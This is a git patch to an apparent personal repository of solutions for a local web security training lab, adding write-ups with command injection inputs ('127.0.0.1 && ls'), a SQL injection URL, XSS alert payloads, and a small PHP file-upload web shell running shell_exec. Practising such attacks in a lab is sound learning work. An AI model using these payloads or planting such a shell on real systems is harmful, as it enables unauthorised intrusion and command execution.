From afaae6aad07750ff25a52c72745a653789bfacfd Mon Sep 17 00:00:00 2001
From: Louis <me@louisgallet.fr>
Date: Fri, 22 Dec 2023 09:35:51 +0100
Subject: [PATCH] docs: :pencil:  Update readme with description of the
 challenge

---
 Command Injection/README.md | 6 +++++-
 File injection/exploit.php  | 4 ++++
 SQL Injection/README.md     | 3 +++
 XSS (DOM)/README.md         | 3 +++
 XSS (Stored)/README.md      | 2 ++
 5 files changed, 17 insertions(+), 1 deletion(-)
 create mode 100644 File injection/exploit.php

diff --git a/Command Injection/README.md b/Command Injection/README.md
index a786274..503018c 100644
--- a/Command Injection/README.md	
+++ b/Command Injection/README.md	
@@ -1,10 +1,14 @@
+# Command Injection
+The aim of this challenge is to inject a command to the server that execute a script.
 # Low
 ```bash
 127.0.0.1 && ls
 ```
 
 # Medium
-> In progress
+```bash
+127.0.0.1 & ls
+```
 
 # High
 > In progress
diff --git a/File injection/exploit.php b/File injection/exploit.php
new file mode 100644
index 0000000..0874e35
--- /dev/null
+++ b/File injection/exploit.php	
@@ -0,0 +1,4 @@
+<?php
+$output = shell_exec('ls');
+echo "<pre>$output</pre>";
+?>
\ No newline at end of file
diff --git a/SQL Injection/README.md b/SQL Injection/README.md
index 901e82f..bc313ba 100644
--- a/SQL Injection/README.md	
+++ b/SQL Injection/README.md	
@@ -1,3 +1,6 @@
+# SQL Injection
+The aim of this challenge is to inject a SQL command to the server that execute a script.
+
 # Low
 Full url : http://localhost:4280/vulnerabilities/sqli/?id=test%27+OR+1=1--%27&Submit=Submit#
 
diff --git a/XSS (DOM)/README.md b/XSS (DOM)/README.md
index 74acb03..e3f2a3c 100644
--- a/XSS (DOM)/README.md	
+++ b/XSS (DOM)/README.md	
@@ -1,3 +1,6 @@
+# XSS (DOM)
+The aim of this challenge is to inject a script to the server that execute a script.
+
 # Low 
 Full URL : [http://localhost:4280/vulnerabilities/xss_d/?default=French<script>alert("Hello hacker")</script>]()
 
diff --git a/XSS (Stored)/README.md b/XSS (Stored)/README.md
index 19fa1d3..13de083 100644
--- a/XSS (Stored)/README.md	
+++ b/XSS (Stored)/README.md	
@@ -1,3 +1,5 @@
+# Stored XSS
+The aim of this challenge is to inject a script to the server that execute a script.
 # Low
 ```javascript
 <script>alert("XSS");</script>